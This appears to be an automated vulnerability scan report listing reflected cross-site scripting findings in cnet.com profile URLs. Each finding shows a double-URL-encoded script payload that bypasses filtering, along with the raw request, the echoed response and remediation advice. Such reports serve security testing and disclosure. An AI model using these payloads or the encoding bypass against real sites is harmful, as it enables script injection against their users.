The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 37d3d%253cscript%253ealert%25281%2529%253c%252fscript%253ee9fd20021a was submitted in the REST URL parameter 2. This input was echoed as 37d3d<script>alert(1)</script>e9fd20021a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/TheAudiophiliac37d3d%253cscript%253ealert%25281%2529%253c%252fscript%253ee9fd20021a/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:16:23 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:16:23 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=984 Connection: Keep-Alive Content-Length: 31162
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>TheAudiophiliac37d3d<script>alert(1)</script>e9fd20021a's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f650%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de20823f4e was submitted in the REST URL parameter 2. This input was echoed as 6f650"><script>alert(1)</script>5de20823f4e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Tim+Leberecht6f650%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de20823f4e/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:25 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:25 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=992 Connection: Keep-Alive Content-Length: 31193
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Tim Leberecht6f650"><script>alert(1)</script>5de20823f4e"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 484ca%253cscript%253ealert%25281%2529%253c%252fscript%253e338945aa69 was submitted in the REST URL parameter 2. This input was echoed as 484ca<script>alert(1)</script>338945aa69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Tim+Leberecht484ca%253cscript%253ealert%25281%2529%253c%252fscript%253e338945aa69/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:27 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:27 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=997 Connection: Keep-Alive Content-Length: 31105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Tim Leberecht484ca<script>alert(1)</script>338945aa69's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35dbe%253cscript%253ealert%25281%2529%253c%252fscript%253ebe6da4cbd2d was submitted in the REST URL parameter 2. This input was echoed as 35dbe<script>alert(1)</script>be6da4cbd2d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Tom+Krazit35dbe%253cscript%253ealert%25281%2529%253c%252fscript%253ebe6da4cbd2d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:05 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:05 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=946 Connection: Keep-Alive Content-Length: 31091
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Tom Krazit35dbe<script>alert(1)</script>be6da4cbd2d's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4af34%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0235fdf41de was submitted in the REST URL parameter 2. This input was echoed as 4af34"><script>alert(1)</script>0235fdf41de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Tom+Krazit4af34%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0235fdf41de/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:04 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:04 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=991 Connection: Keep-Alive Content-Length: 31137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Tom Krazit4af34"><script>alert(1)</script>0235fdf41de"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8999d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5ea4b3b9d67 was submitted in the REST URL parameter 2. This input was echoed as 8999d"><script>alert(1)</script>5ea4b3b9d67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Zoe+Slocum8999d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5ea4b3b9d67/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:43 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:44 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=988 Connection: Keep-Alive Content-Length: 31069
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Zoe Slocum8999d"><script>alert(1)</script>5ea4b3b9d67"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fd7d4%253cscript%253ealert%25281%2529%253c%252fscript%253e0f53dea59e was submitted in the REST URL parameter 2. This input was echoed as fd7d4<script>alert(1)</script>0f53dea59e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Zoe+Slocumfd7d4%253cscript%253ealert%25281%2529%253c%252fscript%253e0f53dea59e/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:44 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:45 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Length: 31033
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Zoe Slocumfd7d4<script>alert(1)</script>0f53dea59e's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c89f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e253e1aef6af was submitted in the REST URL parameter 2. This input was echoed as c89f1"><script>alert(1)</script>253e1aef6af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/acedtectc89f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e253e1aef6af/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:12 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:12 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=998 Connection: Keep-Alive Content-Length: 31067
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="acedtectc89f1"><script>alert(1)</script>253e1aef6af"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 49d3b%253cscript%253ealert%25281%2529%253c%252fscript%253ea3c3b79517e was submitted in the REST URL parameter 2. This input was echoed as 49d3b<script>alert(1)</script>a3c3b79517e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/acedtect49d3b%253cscript%253ealert%25281%2529%253c%252fscript%253ea3c3b79517e/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:13 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:13 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=948 Connection: Keep-Alive Content-Length: 31039
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>acedtect49d3b<script>alert(1)</script>a3c3b79517e's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9d61%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e55fa7de4e2e was submitted in the REST URL parameter 2. This input was echoed as b9d61"><script>alert(1)</script>55fa7de4e2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/antuan.goodwinb9d61%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e55fa7de4e2e/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:04 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:04 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=994 Connection: Keep-Alive Content-Length: 31180
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="antuan.goodwinb9d61"><script>alert(1)</script>55fa7de4e2e"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b00ce%253cscript%253ealert%25281%2529%253c%252fscript%253e4f125594f0d was submitted in the REST URL parameter 2. This input was echoed as b00ce<script>alert(1)</script>4f125594f0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/antuan.goodwinb00ce%253cscript%253ealert%25281%2529%253c%252fscript%253e4f125594f0d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
